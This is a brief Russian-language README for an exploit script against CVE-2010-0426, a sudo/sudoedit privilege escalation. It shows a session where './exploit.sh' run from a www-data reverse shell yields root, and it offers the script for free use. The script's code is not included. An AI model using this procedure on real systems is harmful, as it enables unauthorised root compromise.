
sudo 1.6.x до 1.6.9p21 и 1.7.x до 1.7.2p4 - Эскалация привилегий с помощью sudo и sudoedit
https://www.cvedetails.com/cve/CVE-2010-0426/
sudo версии 1.6.x до 1.6.9p21 и 1.7.x до 1.7.2p4, при включенной псевдо-команде, допускает совпадение между именем псевдо-команды и именем исполняемого файла в произвольном каталоге, что позволяет локальным пользователям получить привилегии с помощью подготовленного исполняемого файла, как показано на примере файла с именем sudoedit в домашнем каталоге пользователя.
Повышение привилегий, когда бинарный файл sudoedit имеет права suid и файл можно редактировать через sudo (проверьте с помощью sudo -l)
./exploit.sh
Повышение до root из низкопривилегированной обратной оболочки
www-data@g1vi:/var/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@g1vi:/var/tmp$ ./exploit.sh
[+] Target is vulnerable
[+] Running stuff...
root@g1vi:/var/tmp$ id
uid=0(root) gid=0(root) groups=0(root)
Можете свободно использовать или изменять когда и где угодно.